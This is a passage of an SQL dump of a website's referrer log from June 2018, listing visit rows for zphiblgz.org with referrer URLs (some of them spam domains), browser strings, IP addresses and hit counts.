18','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1822.A-6D2a2RweWqXQksRVw_y8cNUYhG3ho5y3rTyZEkt3w.b837c045493ded6079506937396926125045edfa&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU042c0FKZ0x0YVoxMEFVOXdRd3luXy1pRnN0V1JxSWUteml4NlNPemlSVkFLdyws&sign=e9a29c4e71bf1bd6ac7fade1bedb34d3&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','138.197.134.63','000',2,0),(31917,'2018-06-18','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1822.qC5WGMNqglIQpOjRwfN2yYqW5U6T9FPlcE7WJm36r1E.8f539dcb1095400ebe5b436a737a31a73db5ae50&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU043Zks5WURYajJSWTN1bDNNRVNiQnB3SWlwbWtzWHdjU1hhSlp5cmNtT2ZBZyws&sign=21cf1de0eca9f7b13b84036620b8b993&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','139.59.249.135','000',2,0),(31918,'2018-06-18','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1822.wQAdHxlreHkz3AIWtVWEv40Dy-paUUSQzHJqjv2aZXE.331c80a52b2d70e2406549fefa6377065c0cfc42&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU043MDVNbXhGTncyaUpfNDlab0VNcmU0cjdpOEV5aW9FelJBSHdDcTdrb2JkZyws&sign=793d97f5adfbc04ff3b749029a8929e1&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','46.101.231.47','000',2,0),(31919,'2018-06-18','https://zphiblgz.org','Chrome','Android','25.0.1364.169','','171.25.193.77','000',1,0),(31920,'2018-06-18','https://officedocuments.net/','MSIE','Windows','6.0','','134.249.48.174','000',3,0),(31921,'2018-06-18','https://zphiblgz.org','CATExplorador','Unknown','1.0beta','','45.63.115.41','000',3,0),(31922,'2018-06-18','https://zphiblgz.org','Chrome','Windows','10.0.649.0','','37.59.55.128','000',29,0),(31923,'2018-06-18','https://zphiblgz.org','Chrome','Windows','57.0.2987.133','','104.131.166.4','000',2,0),(31924,'2018-06-18','https://zphiblgz.org','Chrome','Macintosh','35.0.1916.47','','85.238.100.252','000',2,0),(31925,'2018-06-18','https://zphiblgz.org','Firefox','Windows','40.1','','96.52.137.140','000',2,0),(31926,'2018-06-18','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.183','000',4,0),(31927,'2018-06-18','https://zphiblgz.org','Firefox','Linux','24.0','','173.10.130.218','000',14,0),(31928,'2018-06-18','http://letsearch.ru/','Unknown','Unknown','Unknown','','85.21.99.202','000',2,0),(31929,'2018-06-18','https://zphiblgz.org','Firefox','Windows','40.1','','202.51.181.121','000',2,0),(31930,'2018-06-18','https://zphiblgz.org','Firefox','Windows','40.1','','95.47.214.94','000',2,0),(31931,'2018-06-18','https://zphiblgz.org','Firefox','Windows','40.1','','41.104.129.228','000',2,0),(31932,'2018-06-18','http://www.zphibmaryland.org/chapters/','Chrome','Windows','66.0.3359.181','','100.35.102.58','000',5,0),(31933,'2018-06-18','http://metallo-konstruktsii.ru/','MSIE','Windows','6.0','','178.137.83.231','000',1,0),(31934,'2018-06-18','https://zphiblgz.org','Firefox','Windows','40.1','','117.214.84.85','000',2,0),(31935,'2018-06-19','https://zphiblgz.org','Chrome','Windows','16.0.912.75','','93.179.68.149','000',2,0),(31936,'2018-06-19','https://zphiblgz.org','Chrome','Windows','15.0.860.0','','93.179.68.149','000',1,0),(31937,'2018-06-19','https://zphiblgz.org','Chrome','Linux','10.0.613.0','','93.179.68.149','000',1,0),(31938,'2018-06-19','https://zphiblgz.org','Chrome','Linux','23.0.1271.64','','164.132.211.149','000',2,0),(31939,'2018-06-19','https://modforwot.ru/','MSIE','Windows','6.0','','178.137.83.231','000',4,0),(31940,'2018-06-19','https://luckybull.io/','MSIE','Windows','6.0','','134.249.48.174','000',1,0),(31941,'2018-06-19','https://zphiblgz.org','Unknown','Unknown','Unknown','','47.96.233.155','000',2,0),(31942,'2018-06-19','https://zphiblgz.org','Firefox','Windows','9.0.1','','208.80.194.32','000',1,0),(31943,'2018-06-19','https://zphiblgz.org','Firefox','Windows','3.6.8','','208.80.194.32','000',2,0),(31944,'2018-06-19','https://zphiblgz.org','MSIE','Windows','7.0','','208.80.194.29','000',2,0),(31945,'2018-06-19','https://zphiblgz.org','Firefox','Windows','7.0.1','','208.80.194.29','000',1,0),(31946,'2018-06-19','https://zphiblgz.org','Opera','Windows','8.01','','208.80.194.29','000',1,0),(31947,'2018-06-19','https://zphiblgz.org','Firefox','Windows','3.6.7','','208.80.194.32','000',1,0),(31948,'2018-06-19','https://zphiblgz.org','Safari','iPhone','7.0','','40.77.189.155','000',1,0),(31949,'2018-06-19','https://zphiblgz.org','Chrome','Windows','66.0.3359.181','','185.220.101.15','000',1,0),(31950,'2018-06-19','https://www.google.com/','Safari','Macintosh','11.1.1','','137.155.240.126','000',1,0),(31951,'2018-06-19','https://zphiblgz.org','Chrome','Linux','64.0.3282.119','','199.66.201.19','000',10,0),(31952,'2018-06-19','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1823.iFX7WwWNUg-FUcbfnFLmWkA3eRBrWc-B5RBojRcEJBk.0e0266f37e44178e8b3707a9b09de77019cd2e81&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU040cEppU0wySFVDSl9zM0dJUURWckZRYkV6QWE2ajJidzFXYjdJcGU5N09fQSws&sign=33e348477c57bfeeaf93049b23b2e9aa&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','185.127.17.208','000',2,0),(31953,'2018-06-19','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1823.SgUA0YP8ID4vudhr50_HUNm2fBFtHvVQqvt59sMT4DM.41dec5c990dd75afda9edd56638a471ef79aad24&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU040ZDFhdGJ4U3VCSU5DcnktYTY3T3lheUdBeEtoTFlXOG9ScnhSenAtREpJQSws&sign=b9ef6ff5721c12260098530eb559e745&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','89.145.161.26','000',2,0),(31954,'2018-06-19','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1823.m4ilUM7gHExlll4uQWGZSPdZbxGSdlqLrCs1OlU5zmw.a3969166ffc173cc044f763005de103cd9c3fa48&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU040QXZiNGJQVkhWa09heHk1dmhMRk1WbmY2SE4xdnA3MnJVdjFqLXBkVEZEUSws&sign=e9046c6c52458193b922cc97494233aa&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','159.203.102.223','000',2,0),(31955,'2018-06-19','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1823.c_3Xe0y_ojGvQ2_J48VYwcoCfH_TslUqKF_3LntIuMY.838e055e607e2300d209b685d0b66705c96f0169&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU042VmNZbFJ4TWFGQ3pPYXhqSTBHR3A4dmh1UnVQTHRWOG9KM2lhRXZhbkh1dyws&sign=154574998e7eb8b96e033ae5bc081582&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','159.89.206.126','000',2,0),(31956,'2018-06-19','https://zphiblgz.org','Chrome','Linux','12.0.742.112','','208.80.194.32','000',1,0),(31957,'2018-06-19','http://www.ens-pbs1914.com/links/','Chrome','Windows','67.0.3396.87','','204.194.76.3','000',6,0),(31958,'2018-06-19','http://www.zphiblgz.org','Chrome','Linux','65.0.3325.181','','159.203.99.55','000',1,0),(31959,'2018-06-19','http://zphiblgz.org/','Trident','Unknown','5.0','','180.153.236.101','000',2,0),(31960,'2018-06-19','http://sladkoevideo.com/','MSIE','Windows','6.0','','178.137.160.170','000',10,0),(31961,'2018-06-19','https://zphiblgz.org','MSIE','Windows','8.0','','208.80.194.29','000',1,0),(31962,'2018-06-19','https://zphiblgz.org','MSIE','Windows','9.0','','208.80.194.29','000',1,0),(31963,'2018-06-19','https://zphiblgz.org','Firefox','Windows','40.1','','78.173.240.155','000',2,0),(31964,'2018-06-19','https://zphiblgz.org','Chrome','Macintosh','11.0.696.68','','208.80.194.29','000',1,0),(31965,'2018-06-19','https://zphiblgz.org','MSIE','Windows','8.0','','208.80.194.32','000',1,0),(31966,'2018-06-19','https://zphiblgz.org','MSIE','Windows','8.0','','208.80.194.31','000',1,0),(31967,'2018-06-19','https://zphiblgz.org','Firefox','Macintosh','3.6.11','','208.80.194.32','000',1,0),(31968,'2018-06-19','https://zphiblgz.org','Chrome','Windows','10.0.648.133','','208.80.194.32','000',1,0),(31969,'2018-06-19','https://zphiblgz.org','MSIE','Windows','7.0','','208.80.194.32','000',1,0),(31970,'2018-06-19','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.186','000',4,0),(31971,'2018-06-19','http://www.zphibmaryland.org/chapters/','Chrome','Windows','67.0.3396.87','','71.179.245.115','000',3,0),(31972,'2018-06-19','https://zphiblgz.org','Chrome','Windows','67.0.3396.87','','80.93.187.145','000',2,0),(31973,'2018-06-19','https://zphiblgz.org','MSIE','Windows','11.0','','176.31.64.186','000',1,0),(31974,'2018-06-19','https://zphiblgz.org','MSIE','Windows','11.0','','5.9.17.118','000',1,0),(31975,'2018-06-19','https://zphiblgz.org','Chrome','Macintosh','26.0.1410.65','','34.221.10.72','000',2,0),(31976,'2018-06-19','https://zphiblgz.org','Chrome','Windows','34.0.1847.137','','107.175.35.184','000',1,0),(31977,'2018-06-19','https://zphiblgz.org','Chrome','Windows','65.0.3325.181','','52.165.166.139','000',1,0),(31978,'2018-06-19','https://zphiblgz.org','Chrome','Linux','5.0.375.53','','208.80.194.27','000',1,0),(31979,'2018-06-20','https://zphiblgz.org','Unknown','Unknown','Unknown','','47.96.234.243','000',2,0),(31980,'2018-06-20','https://zphiblgz.org','Safari','Macintosh','11.0','','173.201.196.111','000',1,0),(31981,'2018-06-20','https://zphiblgz.org','Chrome','Linux','23.0.1271.64','','46.101.17.70','000',2,0),(31982,'2018-06-20','https://zphiblgz.org','Chrome','Linux','12.0.742.112','','208.80.194.28','000',1,0),(31983,'2018-06-20','https://zphiblgz.org','Firefox','Windows','3.6.18','','208.80.194.29','000',1,0),(31984,'2018-06-20','https://zphiblgz.org','MSIE','Windows','8.0','','208.80.194.29','000',1,0),(31985,'2018-06-20','https://zphiblgz.org','Safari','Macintosh','5.1','','208.80.194.31','000',1,0),(31986,'2018-06-20','https://zphiblgz.org','Firefox','Windows','4.0.1','','208.80.194.31','000',1,0),(31987,'2018-06-20','https://zphiblgz.org/','MSIE','Windows','11.0','','51.15.64.212','000',1,0),(31988,'2018-06-20','https://zphiblgz.org','MSIE','Windows','6.0','','208.80.194.32','000',1,0),(31989,'2018-06-20','https://zphiblgz.org','Chrome','Macintosh','51.0.2704.84','','166.62.126.3','000',2,0),(31990,'2018-06-20','https://zphiblgz.org','MSIE','Windows','7.0','','208.80.194.29','000',1,0),(31991,'2018-06-20','https://zphiblgz.org','Opera','Windows','8.01','','208.80.194.28','000',1,0),(31992,'2018-06-20','https://zphiblgz.org','Chrome','Windows','47.0.2526.106','','185.47.223.198','000',1,0),(31993,'2018-06-20','https://zphiblgz.org','Firefox','Windows','52.0','','46.229.170.197','000',1,0),(31994,'2018-06-20','https://zphiblgz.org','Firefox','Windows','3.6.13','','208.80.194.27','000',1,0),(31995,'2018-06-20','https://zphiblgz.org','Firefox','Windows','3.6.8','','208.80.194.27','000',1,0),(31996,'2018-06-20','https://zphiblgz.org','python-requests','Unknown','2.9.1','','188.166.34.95','000',1,0),(31997,'2018-06-20','https://zphiblgz.org','Firefox','Windows','49.0','','52.21.167.203','000',2,0),(31998,'2018-06-20','https://zphiblgz.org','Chrome','Windows','41.0.2228.0','','195.22.127.139','000',2,0),(31999,'2018-06-20','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1824.tsZ6gZFxJVk6L0ll7V10_aBx2vlfAK3LjhhXGNjMRGA.c3ec517200e684fac729814c0cd5f4dbf576b643&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU042TlhRVy1zQWo4ek1XeS1iRGM1RWEyRnVFVWNuanNxb3d4TE9SUzlpN3dLQSws&sign=8699516948d4ac8308271dfc3274a674&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','46.101.74.31','000',2,0),(32000,'2018-06-20','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1824.cFGXrmyV6emQfjEral2X9YzhgcyKj_R-PhKmQh62Sfg.b8508cf83e1f5959293df4038ade377766e12d60&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU041UERYRVlQaVFvVTE1UXp1S0k0ajVtTzMwLW1HV2ZWVTBBa0tkQVhSbk1tdyws&sign=9bdf8770b2a0e4b7b019f71ba23460cc&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','162.243.150.156','000',2,0),(32001,'2018-06-20','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1824.DeRuc4QkoK3tQvk2pc22IWL3W3RH7jpOHc4u6KzdJXU.971f8a9363da148f77e5582f3499eea78ed1a61c&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU041bnB4aDcxWFNzaHdMUF8tLWhqWVhYalpleFRacnZGU3B4RTkxZ1Z1c2ZSUSws&sign=79d5cd45f5d94425527c95214c0ebe1a&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','159.89.111.39','000',2,0),(32002,'2018-06-20','https://zphiblgz.org','Chrome','Macintosh','61.0.3163.100','','13.57.220.0','000',2,0),(32003,'2018-06-20','https://zphiblgz.org','MSIE','Windows','9.0','','50.17.38.4','000',22,0),(32004,'2018-06-20','https://zphiblgz.org','Dispatch','Unknown','0.11.3','','38.77.218.113','000',2,0),(32005,'2018-06-20','https://zphiblgz.org','Dispatch','Unknown','0.11.3','','38.77.212.75','000',2,0),(32006,'2018-06-20','https://zphiblgz.org','Dispatch','Unknown','0.11.3','','38.94.190.26','000',1,0),(32007,'2018-06-20','https://zphiblgz.org','Dispatch','Unknown','0.11.3','','38.94.178.250','000',2,0),(32008,'2018-06-20','https://zphiblgz.org','Dispatch','Unknown','0.11.3','','38.77.220.113','000',2,0),(32009,'2018-06-20','https://zphiblgz.org','Dispatch','Unknown','0.11.3','','38.94.190.222','000',2,0),(32010,'2018-06-20','https://zphiblgz.org','Dispatch','Unknown','0.11.3','','38.77.216.38','000',2,0),(32011,'2018-06-20','http://pornoplen.com/','MSIE','Windows','5.0','','46.119.126.184','000',1,0),(32012,'2018-06-20','https://zphiblgz.org','Unknown','Unknown','Unknown','','194.187.170.127','000',12,0),(32013,'2018-06-20','https://www.google.com/','Chrome','Android','45.0.2454.95','','172.56.1.28','000',6,0),(32014,'2018-06-20','https://zphiblgz.org','Firefox','Windows','40.1','','47.247.238.29','000',2,0),(32015,'2018-06-20','https://zphiblgz.org','Firefox','Macintosh','3.6.11','','208.80.194.32','000',1,0),(32016,'2018-06-20','https://zphiblgz.org/membership/','AppleWebKit','Windows','534','','199.30.24.26','000',2,0),(32017,'2018-06-20','https://zphiblgz.org','Chrome','Macintosh','51.0.2729.68','','107.172.44.252','000',1,0),(32018,'2018-06-20','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.184','000',5,0),(32019,'2018-06-20','https://www.google.com/','Chrome','Windows','67.0.3396.87','','96.244.96.210','000',6,0),(32020,'2018-06-20','https://zphiblgz.org','Chrome','Windows','40.0.2214.85','','138.246.253.5','000',1,0),(32021,'2018-06-20','https://zphiblgz.org','MSIE','Windows','7.0','','208.80.194.27','000',1,0),(32022,'2018-06-20','https://zphiblgz.org','MSIE','Windows','9.0','','208.80.194.27','000',1,0),(32023,'2018-06-20','https://zphiblgz.org','Firefox','Windows','21.0','','176.31.238.59','000',2,0),(32024,'2018-06-20','https://zphiblgz.org','SamsungBrowser','Android','7.2','','100.34.216.123','000',3,0),(32025,'2018-06-20','https://zphiblgz.org','Chrome','Windows','10.0.648.133','','208.80.194.32','000',1,0),(32026,'2018-06-20','https://zphiblgz.org','MSIE','Windows','7.0','','208.80.194.32','000',1,0),(32027,'2018-06-20','https://zphiblgz.org','Firefox','Macintosh','58.0','','88.99.27.172','000',1,0),(32028,'2018-06-20','https://zphiblgz.org','Chrome','Windows','66.0.3359.181','','51.15.231.97','000',1,0),(32029,'2018-06-20','https://sinhronperevod.ru/prices','MSIE','Windows','5.5','','46.185.119.21','000',3,0),(32030,'2018-06-20','https://zphiblgz.org','Chrome','Linux','5.0.375.53','','208.80.194.27','000',1,0),(32031,'2018-06-20','https://pills24h.com/','MSIE','Windows','6.0','','46.118.117.97','000',5,0),(32032,'2018-06-20','https://zphiblgz.org','AppleWebKit','Windows','534','','40.77.188.91','000',1,0),(32033,'2018-06-20','https://zphiblgz.org','AppleWebKit','Windows','534','','40.77.188.79','000',1,0),(32034,'2018-06-20','https://ask-yug.com/','MSIE','Windows','6.0','','46.119.126.184','000',1,0),(32035,'2018-06-20','https://zphiblgz.org','Unknown','Unknown','Unknown','','167.114.172.224','000',12,0),(32036,'2018-06-20','https://zphiblgz.org','Chrome','Android','45.0.2454.94','','167.114.172.224','000',1,0),(32037,'2018-06-20','https://zphiblgz.org','Safari','Macintosh','5.1','','208.80.194.30','000',1,0),(32038,'2018-06-21','https://zphiblgz.org','Chrome','Linux','23.0.1271.64','','164.132.211.152','000',3,0),(32039,'2018-06-21','https://zphiblgz.org','Firefox','Windows','29.0','','161.69.99.11','000',2,0),(32040,'2018-06-21','http://74.220.219.51','Go--client','Unknown','1.1','','161.69.99.11','000',2,0),(32041,'2018-06-21','https://zphiblgz.org','Unknown','Unknown','Unknown','','47.96.233.155','000',2,0),(32042,'2018-06-21','https://zphiblgz.org','Chrome','Windows','65.0.3325.181','','52.165.166.139','000',3,0),(32043,'2018-06-21','https://zphiblgz.org','Chrome','Windows','62.0.3202.94','','104.144.173.66','000',1,0),(32044,'2018-06-21','https://zphiblgz.org','Opera','Windows','8.50','','104.144.173.66','000',1,0),(32045,'2018-06-21','http://zphiblgz.org/scholarship/','Safari','iPhone','7.0','','199.30.25.99','000',1,0),(32046,'2018-06-21','https://zphiblgz.org','MSIE','Windows','6.0','','208.80.194.29','000',1,0),(32047,'2018-06-21','https://zphiblgz.org','Firefox','Windows','3.6.23','','208.80.194.29','000',1,0),(32048,'2018-06-21','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1825.9Km5vdN0-Sb3BlrSWx7Ok_WPb5lMsjSPUIU1iDjGxpA.43a5df79336150ecf82c80510dd0b5af13534996&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU043NVpCZDRKM2tEQ0tFYTFUclU0Z3RsY1RySFVaRl9Bc2NMN3Q1S0lqclFjZyws&sign=d8043c632555f085baa441369f17e802&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','67.205.134.58','000',2,0),(32049,'2018-06-21','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1825.0SzHXf7yna9a5VqGOnkkuVxt7UjDWyQ0xQKM5Rf0Wkg.d738def80564a620f500410956d595a4a67116e8&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU043TVZWT29uT0p3T2lPdUZFOGFLRndNT3EwZURaWnFQV01WaE90c21SZEpFdyws&sign=c0719fb971a18fabc50a7d8be82e0dcd&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','165.227.35.23','000',2,0),(32050,'2018-06-21','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1825.O88Gr-GB73MdWzQ0rr_JdP4PLN_2Hfd1Zbm2bH8TZcs.a630724b22d514079fd06bdce653fed119c2f811&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU043Wi1XclVVaFd1MWdkclhJTmVzTUJmS2VYZ0p4M0I2dDl6eUhFcXJpeF9CUSws&sign=921a4a375b67b65e246882482a4c42ca&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','165.227.228.166','000',2,0),(32051,'2018-06-21','https://zphiblgz.org','Chrome','Windows','66.0.3359.181','','185.185.24.63','000',1,0),(32052,'2018-06-21','https://zphiblgz.org','Unknown','Unknown','Unknown','','45.61.154.73','000',2,0),(32053,'2018-06-21','https://zphiblgz.org','Unknown','Unknown','Unknown','','107.172.52.90','000',1,0),(32054,'2018-06-21','https://zphiblgz.org','MSIE','Windows','8.0','','208.80.194.32','000',1,0),(32055,'2018-06-21','https://zphiblgz.org','Unknown','Unknown','Unknown','','47.96.233.222','000',2,0),(32056,'2018-06-21','https://zphiblgz.org/','Trident','Unknown','5.0','','180.153.234.145','000',1,0),(32057,'2018-06-21','http://zphiblgz.org/','Trident','Unknown','5.0','','180.153.236.133','000',2,0),(32058,'2018-06-21','http://www.alinabaniecka.pl/en/what-do-i-offer/','MSIE','Windows','6.0','','46.118.117.97','000',1,0),(32059,'2018-06-21','https://zphiblgz.org','Safari','Macintosh','5.1','','208.80.194.32','000',1,0),(32060,'2018-06-21','https://spb-plitka.ru/','MSIE','Windows','6.0','','46.118.113.218','000',4,0),(32061,'2018-06-21','https://zphiblgz.org','Chrome','Windows','11.0.696.68','','208.80.194.31','000',1,0),(32062,'2018-06-21','https://zphiblgz.org','MSIE','Windows','8.0','','208.80.194.31','000',2,0),(32063,'2018-06-21','https://zphiblgz.org','Chrome','Windows','66.0.3359.181','','178.17.166.147','000',1,0),(32064,'2018-06-21','https://zphiblgz.org','Firefox','Linux','3.6.13','','208.80.194.31','000',1,0),(32065,'2018-06-21','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.184','000',4,0),(32066,'2018-06-21','https://zphiblgz.org','yd','Unknown','Unknown','','185.35.63.123','000',1,0),(32067,'2018-06-21','https://zphiblgz.org','MSIE','Windows','8.0','','208.80.194.27','000',1,0),(32068,'2018-06-21','https://zphiblgz.org','Firefox','Linux','57.0','','88.99.27.172','000',1,0),(32069,'2018-06-21','https://zphiblgz.org','Safari','Macintosh','5.1.9','','148.251.75.46','000',1,0),(32070,'2018-06-21','https://zphiblgz.org','Firefox','Linux','57.0','','78.46.156.169','000',1,0),(32071,'2018-06-21','https://zphiblgz.org','Chrome','Windows','11.0.696.68','','208.80.194.30','000',1,0),(32072,'2018-06-21','https://zphiblgz.org','Chrome','Windows','10.0.648.133','','208.80.194.30','000',1,0),(32073,'2018-06-21','http://zphiblgz.org/','Chrome','Windows','57.0.2987.133','','163.172.4.153','000',2,0),(32074,'2018-06-21','https://zphiblgz.org','Firefox','Windows','40.1','','82.117.238.161','000',2,0),(32075,'2018-06-21','http://pk-pomosch.ru/','MSIE','Windows','5.5','','46.119.126.184','000',3,0),(32076,'2018-06-21','https://sinhronperevod.ru/service/sinhroniy-angliskiy','MSIE','Windows','6.0','','46.185.119.21','000',3,0),(32077,'2018-06-21','https://zphiblgz.org','Unknown','Unknown','Unknown','','54.236.1.14','000',2,0),(32078,'2018-06-21','https://www.atyks.ru/','MSIE','Windows','5.5','','46.118.113.218','000',2,0),(32079,'2018-06-21','https://zphiblgz.org','Firefox','Linux','50.0','','137.226.113.34','000',2,0),(32080,'2018-06-21','https://zphiblgz.org','Unknown','Unknown','Unknown','','137.226.113.28','000',4,0),(32081,'2018-06-21','https://zphiblgz.org','Unknown','Unknown','Unknown','','35.231.21.106','000',5,0),(32082,'2018-06-22','https://zphiblgz.org','Safari','iPhone','7.0','','40.77.190.108','000',1,0),(32083,'2018-06-22','https://zphiblgz.org','Chrome','Linux','23.0.1271.64','','165.227.234.24','000',3,0),(32084,'2018-06-22','https://filesdatabase.net/','MSIE','Windows','6.0','','46.119.126.184','000',3,0),(32085,'2018-06-22','https://zphiblgz.org','Chrome','Macintosh','51.0.2704.84','','166.62.126.3','000',2,0),(32086,'2018-06-22','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1826.OnN4WbpTQOtV2t7_FfjCrc3-3aKd99ADgzN2J5IHVgE.568bb8f6827fe609649776c3dc0b57a7e80b04c3&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU043VVcwN3drWGNST1ZrWHl0Sld6dU9SUlpCZUNTd3NJVUNEQnBHNjlaWVREdyws&sign=4e5f651fb0f76470aabd250d5371a5ad&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','45.55.171.154','000',2,0),(32087,'2018-06-22','http://yandex.ru/yandsearch?text=https://yandex.ru/clck/jsredir%3Ffrom%3Dyandex.ru%253Bsearch%253Bweb%253B%253B%26text%3D%26etext%3D1827.mjzvxZJ1omoHIig_sgRoAox9-vyqxZRNcEFpFWsaSYE_IH6L2nbrCPR80vvBEpfM.480dead369fe73a8ff1ed1f2622e7ff996c07677%26uuid%3D%26state%3D_BLhILn4SxNIvvL0W45KSic66uCIg23qh8iRG98qeIXmeppkgUc0YKCJkrjchpDstTwxTkjwGrA%26data%3DUlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV2REMmNVN0R2VGlkcHlQZDNhNHZYVVhfNU56MVpNN21PaHY4UzR3N1RZNlBFaC1xdExhV0xXUlJNRmxiNm5DOW9KMTlHV0lXdUdVdw%26b64e%3D2%26sign%3D91d06794c28e1c1d048af45b40f13bdd%26keyno%3D0%26cst%3DAiuY0DBWFJ7IXge4WdYJQSaYtyyri96FpD6tlj6EzVrGARHZPE07QSgf-qymb6TvZ_7Y6VahA_0UX-bNURQ3k6hm1ulPtmxbJV77KaJcfW